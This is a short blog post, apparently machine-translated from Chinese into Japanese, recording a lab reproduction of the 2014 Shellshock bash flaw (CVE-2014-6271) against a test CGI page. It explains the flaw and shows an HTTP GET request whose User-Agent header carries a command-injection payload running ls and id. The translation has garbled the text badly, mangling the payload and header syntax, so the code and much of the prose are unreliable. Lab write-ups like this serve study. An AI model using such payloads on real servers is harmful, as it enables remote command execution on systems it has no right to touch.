2014年シェルショック脆弱性リモートコマンドインジェクション(CVE-2014から6271)の脆弱性の再現性

  • この投稿は唯一のレコードを学んでいた、違法な使用を使用しないでください。
  • shelshocke説明
    • 2014年シェルショック脆弱性UNIXシステムでbashシェルの脆弱性、バッシュ4.3およびそれ以前のセキュリティ上の脆弱性が時に、この脆弱性をトリガーする環境変数の値を超える文字列で定義された関数に追加し、環境変数のいくつかの構造を扱います攻撃者が任意のシェルコマンド、またはターゲット・システムであっても完全な制御を実行するための環境の変化や制限を回避するには、この脆弱性を悪用する可能性があります。
    • 末尾に「(){」環境変数によって定義された開始時、および環境変数の悪意のある機能を処理する場合、および機能を終了しない「}」、呼び出す関数名が使用する環境変数バッシュ、および悪意のあるシェルコマンドの実装が続きます。
    • 環境変数としてCGI意志リファラー、ホスト、ユーザーエージェント、ヘッダ処理等を実行する際のbashが起動されます。
    • 参考リンクします。https://blog.csdn.net/qq_40657585/article/details/83242985
  • レコードを再現:
    • オープンのhttp:// IP:8080、脆弱性があり、bash4.3ページによって生成されたvictim.cgi、safe.cgiはbashの新しいバージョンによって生成され、2つのCGIファイルを準備するために範囲を撮影見ることができます。
    • ペイロード

      • エージェントユーザー:(){:;};エコー; $エコー(/ binに/ LS / -al);は/ usr / binに/ 上記のIDは、実際に、私は何度試してみましたこの時期は、また、結果の実装に影響を与えるコマンドの順序を切り替えますこれは、この新人を把握ません。
        GET /victim.cgi HTTP / 1.1 
        ホスト:192.168183.1348080 
        ユーザー -agent:(){;};エコー;の/ usr / binに/; $(/ビン/ LS / -Al)エコーID。
        受け入れる: * / * テキスト/ HTML、アプリケーション/ XHTML + xmlの、アプリケーション/ XML、Q = 0.9、* / *; Q = 0.8 
        受け入れる -Languageを:ZH-CN、ZH; Q = 0.8、ZH-TW; Q = 0.7、ZH-HK; Q = 0.5、EN-US; Q = 0.3、EN; Q = 0.2 
        受け入れ - エンコーディング:GZIPを収縮させます
        接続:近いです
        リファラーます。http:// 192.168.183.134:8080/ 
        アップグレード-安全でない-要求:1
    • この問題は、一時的に保管してください。

 

おすすめ

転載: www.cnblogs.com/foe0/p/11359060.html